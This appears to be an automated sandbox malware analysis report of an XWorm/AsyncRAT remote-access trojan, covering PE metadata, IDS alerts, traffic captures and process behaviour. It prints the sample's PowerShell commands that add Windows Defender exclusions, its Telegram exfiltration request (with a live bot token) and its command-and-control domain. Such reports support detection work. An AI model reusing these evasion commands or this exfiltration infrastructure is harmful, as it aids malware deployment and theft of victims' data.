                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb3e80x53.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4d8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x94440x9600bfe1b3cb90cc5ce86496a9a95d11d1f2False0.4913020833333333data5.68571702212104IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xc0000x4d80x6002472af5ddbb53779b7381f16b8b9407bFalse0.3756510416666667data3.7216503306685733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xe0000xc0x20047e35f5613d58a1dcbd0066eff54903fFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0xc0a00x244data0.4724137931034483
                                                                  RT_MANIFEST0xc2e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-09-17T17:26:33.365190+02002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.649719149.154.167.220443TCP
                                                                  2024-09-17T17:27:10.017016+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649724147.185.221.2156417TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 17, 2024 17:26:32.435970068 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:32.436028957 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:32.436153889 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:32.444457054 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:32.444488049 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:33.061559916 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:33.061707020 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:33.064205885 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:33.064234972 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:33.064579964 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:33.108582973 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:33.151427031 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:33.365217924 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:33.365367889 CEST44349719149.154.167.220192.168.2.6
                                                                  Sep 17, 2024 17:26:33.365443945 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:33.385499001 CEST49719443192.168.2.6149.154.167.220
                                                                  Sep 17, 2024 17:26:37.652972937 CEST4972156417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:37.657946110 CEST5641749721147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:26:37.658035994 CEST4972156417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:37.701281071 CEST4972156417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:37.711170912 CEST5641749721147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:26:52.050946951 CEST4972156417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:52.055916071 CEST5641749721147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:26:59.046892881 CEST5641749721147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:26:59.046988010 CEST4972156417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:59.138948917 CEST4972156417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:59.141267061 CEST4972456417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:59.143874884 CEST5641749721147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:26:59.146174908 CEST5641749724147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:26:59.146249056 CEST4972456417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:59.273515940 CEST4972456417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:26:59.278532028 CEST5641749724147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:10.017015934 CEST4972456417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:10.022094011 CEST5641749724147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:20.529722929 CEST5641749724147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:20.529853106 CEST4972456417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.782371998 CEST4972456417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.784394979 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.787466049 CEST5641749724147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:22.789448023 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:22.789546967 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.812690973 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.817555904 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:35.938864946 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:35.943952084 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:43.704189062 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:43.709101915 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:44.184370041 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:44.184663057 CEST4972556417192.168.2.6147.185.221.21

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 17, 2024 17:26:32.420015097 CEST6097253192.168.2.61.1.1.1
                                                                  Sep 17, 2024 17:26:32.428956032 CEST53609721.1.1.1192.168.2.6
                                                                  Sep 17, 2024 17:26:37.616822958 CEST5940353192.168.2.61.1.1.1
                                                                  Sep 17, 2024 17:26:37.649071932 CEST53594031.1.1.1192.168.2.6

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Sep 17, 2024 17:26:32.420015097 CEST192.168.2.61.1.1.10x8624Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                  Sep 17, 2024 17:26:37.616822958 CEST192.168.2.61.1.1.10xa552Standard query (0)paul-vocational.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Sep 17, 2024 17:26:32.428956032 CEST1.1.1.1192.168.2.60x8624No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                  Sep 17, 2024 17:26:37.649071932 CEST1.1.1.1192.168.2.60xa552No error (0)paul-vocational.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • api.telegram.org

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.649719149.154.167.2204433576C:\Users\user\Desktop\NzEsfIiAc0.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-09-17 15:26:33 UTC449OUTGET /bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                  Host: api.telegram.org
                                                                  Connection: Keep-Alive
                                                                  2024-09-17 15:26:33 UTC388INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Tue, 17 Sep 2024 15:26:33 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 451
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2024-09-17 15:26:33 UTC451INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 35 37 30 35 32 33 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 66 66 69 63 65 33 36 35 20 56 69 72 75 73 20 52 65 73 75 6c 74 7a 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 72 67 61 6e 7a 33 36 35 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 33 37 38 36 31 39 38 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 53 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 73 72 5f 73 61 66 6b 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 36 35 38 36 37 39 33 2c 22 74 65 78 74 22 3a 22 5c 75 32
                                                                  Data Ascii: {"ok":true,"result":{"message_id":352,"from":{"id":7257052308,"is_bot":true,"first_name":"Office365 Virus Resultz","username":"Morganz365bot"},"chat":{"id":6378619811,"first_name":"HSR","username":"Hsr_safk","type":"private"},"date":1726586793,"text":"\u2


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:11:25:33
                                                                  Start date:17/09/2024
                                                                  Path:C:\Users\user\Desktop\NzEsfIiAc0.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\NzEsfIiAc0.exe"
                                                                  Imagebase:0x260000
                                                                  File size:40'960 bytes
                                                                  MD5 hash:BFDF788A451CF345E09E7646734F4666
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:2
                                                                  Start time:11:25:37
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:11:25:37
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:11:25:43
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:11:25:43
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:11:25:54
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:11:25:54
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:11:26:10
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:11:26:10
                                                                  Start date:17/09/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:20%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:6
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 4854 7ffd3477202a 4855 7ffd34772570 RtlSetProcessIsCritical 4854->4855 4857 7ffd34772622 4855->4857 4846 7ffd34773638 4847 7ffd34773641 SetWindowsHookExW 4846->4847 4849 7ffd34773711 4847->4849

                                                                    Executed Functions

                                                                    Function 00007FFD347705B8 Relevance: 2.0, Strings: 1, Instructions: 709COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CAO_^
                                                                    • API String ID: 0-3111533842
                                                                    • Opcode ID: b4807f3394d74b09bcbcd964ce290d1a9ae81de574dd794918b7faa9615aeb3a
                                                                    • Instruction ID: 1c9b8e4296764a968ce48e7c0869e63e855cdf976426eec5d933a896518a64e2
                                                                    • Opcode Fuzzy Hash: b4807f3394d74b09bcbcd964ce290d1a9ae81de574dd794918b7faa9615aeb3a
                                                                    • Instruction Fuzzy Hash: 7922E861B18A494FE7A4EB7888B967D7BD1FF89304F804579E44EC3292DE68BC418781
                                                                    Function 00007FFD347770B6 Relevance: .5, Instructions: 471COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 565 7ffd347770b6-7ffd347770c3 566 7ffd347770ce-7ffd34777197 565->566 567 7ffd347770c5-7ffd347770cd 565->567 571 7ffd34777203 566->571 572 7ffd34777199-7ffd347771a2 566->572 567->566 573 7ffd34777205-7ffd3477722a 571->573 572->571 574 7ffd347771a4-7ffd347771b0 572->574 580 7ffd3477722c-7ffd34777235 573->580 581 7ffd34777296 573->581 575 7ffd347771b2-7ffd347771c4 574->575 576 7ffd347771e9-7ffd34777201 574->576 578 7ffd347771c8-7ffd347771db 575->578 579 7ffd347771c6 575->579 576->573 578->578 582 7ffd347771dd-7ffd347771e5 578->582 579->578 580->581 583 7ffd34777237-7ffd34777243 580->583 584 7ffd34777298-7ffd34777340 581->584 582->576 585 7ffd3477727c-7ffd34777294 583->585 586 7ffd34777245-7ffd34777257 583->586 595 7ffd34777342-7ffd3477734c 584->595 596 7ffd347773ae 584->596 585->584 587 7ffd3477725b-7ffd3477726e 586->587 588 7ffd34777259 586->588 587->587 591 7ffd34777270-7ffd34777278 587->591 588->587 591->585 595->596 597 7ffd3477734e-7ffd3477735b 595->597 598 7ffd347773b0-7ffd347773d9 596->598 599 7ffd34777394-7ffd347773ac 597->599 600 7ffd3477735d-7ffd3477736f 597->600 604 7ffd34777443 598->604 605 7ffd347773db-7ffd347773e6 598->605 599->598 602 7ffd34777373-7ffd34777386 600->602 603 7ffd34777371 600->603 602->602 606 7ffd34777388-7ffd34777390 602->606 603->602 608 7ffd34777445-7ffd347774d6 604->608 605->604 607 7ffd347773e8-7ffd347773f6 605->607 606->599 609 7ffd3477742f-7ffd34777441 607->609 610 7ffd347773f8-7ffd3477740a 607->610 616 7ffd347774dc-7ffd347774eb 608->616 609->608 611 7ffd3477740e-7ffd34777421 610->611 612 7ffd3477740c 610->612 611->611 614 7ffd34777423-7ffd3477742b 611->614 612->611 614->609 617 7ffd347774f3-7ffd34777558 call 7ffd34777574 616->617 618 7ffd347774ed 616->618 625 7ffd3477755f-7ffd34777573 617->625 626 7ffd3477755a 617->626 618->617 626->625
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f63210fcc299d98bcf32e1630bbe408e66ed3ddb9f52a9d44e5f61c803626fc0
                                                                    • Instruction ID: a84a833584a4f6185a862f4719ededc0f1c2efa0928656a917cc5fe20ef4c7a1
                                                                    • Opcode Fuzzy Hash: f63210fcc299d98bcf32e1630bbe408e66ed3ddb9f52a9d44e5f61c803626fc0
                                                                    • Instruction Fuzzy Hash: 03F1A670608A4D8FEBA8DF28CC557F97BE1FF55310F54826AE84DC7291CB78A9418B81
                                                                    Function 00007FFD34777E62 Relevance: .5, Instructions: 458COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 620a485c901437301660681409dd0b172c17e751d2c2f3d42f15a1ff130e1535
                                                                    • Instruction ID: 4cb4cdf80d45a5797c997c6495cd83a0e1ee2fca583c5477c760da0a43fc6027
                                                                    • Opcode Fuzzy Hash: 620a485c901437301660681409dd0b172c17e751d2c2f3d42f15a1ff130e1535
                                                                    • Instruction Fuzzy Hash: 22E1A570A08A4D8FEBA8DF28C8657F97BD1FB55310F54826ED84DC7291CE78A84187C1
                                                                    Function 00007FFD3477253D Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 193 7ffd3477253d-7ffd3477256a 194 7ffd347725a0-7ffd34772620 RtlSetProcessIsCritical 193->194 195 7ffd3477256c-7ffd34772599 193->195 198 7ffd34772622 194->198 199 7ffd34772628-7ffd3477265d 194->199 195->194 198->199
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalProcess
                                                                    • String ID:
                                                                    • API String ID: 2695349919-0
                                                                    • Opcode ID: 11b8860aab8fceae604275fe99d7f9a3081629ea5c119d2ddcc679f670e20394
                                                                    • Instruction ID: c5e265fd1d75c47cc6f2fbaaaec029a4a9634f249effbb9d963e3ca1207c0e4f
                                                                    • Opcode Fuzzy Hash: 11b8860aab8fceae604275fe99d7f9a3081629ea5c119d2ddcc679f670e20394
                                                                    • Instruction Fuzzy Hash: 0D41043190CA588FD718DFA8C855AE9BBF0FF56311F04416FE08AD3592CB686846CB91
                                                                    Function 00007FFD34773638 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 201 7ffd34773638-7ffd3477363f 202 7ffd34773641-7ffd34773649 201->202 203 7ffd3477364a-7ffd3477365a 201->203 202->203 204 7ffd34773690-7ffd347736bd 203->204 205 7ffd3477365c-7ffd3477368c 203->205 208 7ffd347736c3-7ffd347736d0 204->208 209 7ffd34773749-7ffd3477374d 204->209 205->204 210 7ffd347736d2-7ffd3477370f SetWindowsHookExW 208->210 209->210 212 7ffd34773711 210->212 213 7ffd34773717-7ffd34773748 210->213 212->213
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 4321a89f0040b05847e87d0bab0953eaf716e9d08db5c22a4201785764e4f6ea
                                                                    • Instruction ID: fb0939bde0a1174568df7e770d16b98d7c4c4e55b7f3905204852c7845cffa2e
                                                                    • Opcode Fuzzy Hash: 4321a89f0040b05847e87d0bab0953eaf716e9d08db5c22a4201785764e4f6ea
                                                                    • Instruction Fuzzy Hash: AB41F871A1CA5D8FDB58DF5C98566F9BBE1EB99321F00423ED009D3292CA64B852C7C1
                                                                    Function 00007FFD3477202A Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 216 7ffd3477202a-7ffd347725ba 219 7ffd347725c2-7ffd34772620 RtlSetProcessIsCritical 216->219 220 7ffd34772622 219->220 221 7ffd34772628-7ffd3477265d 219->221 220->221
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalProcess
                                                                    • String ID:
                                                                    • API String ID: 2695349919-0
                                                                    • Opcode ID: f5a7038b086e1ccd6e51eb9a2a4de809135cc783387bda33d56968f7f6841c17
                                                                    • Instruction ID: 2398ef5090a70474280316440e3b35f4a63471f16f3cb48fcb42ffbe67936f96
                                                                    • Opcode Fuzzy Hash: f5a7038b086e1ccd6e51eb9a2a4de809135cc783387bda33d56968f7f6841c17
                                                                    • Instruction Fuzzy Hash: AB31D271908A188FDB28DF9CD845BFDBBE0FF59311F14412EE09AD3682CB7468528B91

                                                                    Non-executed Functions

                                                                    Function 00007FFD34773982 Relevance: .2, Instructions: 172COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
